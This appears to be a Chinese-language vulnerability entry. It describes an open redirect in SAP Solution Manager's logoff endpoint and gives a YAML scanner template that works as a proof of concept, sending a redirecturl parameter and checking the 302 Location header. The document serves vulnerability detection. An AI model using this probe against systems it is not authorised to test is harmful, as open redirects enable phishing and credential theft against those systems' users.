漏洞描述
SAP Solution Manager contains an open redirect vulnerability via the logoff endpoint. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
sap-redirect: SAP Solution Manager - Open Redirect
PoC代码[已公开]
id: sap-redirect
info:
name: SAP Solution Manager - Open Redirect
author: Gal Nagli
severity: medium
description: |-
SAP Solution Manager contains an open redirect vulnerability via the logoff endpoint. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
created: 2024/04/15
rules:
r0:
request:
method: GET
path: /sap/public/bc/icf/logoff?redirecturl=https://example.com
expression: |
response.status == 302 &&
(response.raw_header.bcontains(b'Location: https://www.example.com') || response.raw_header.bcontains(b'Location: https://example.com') )
expression: r0()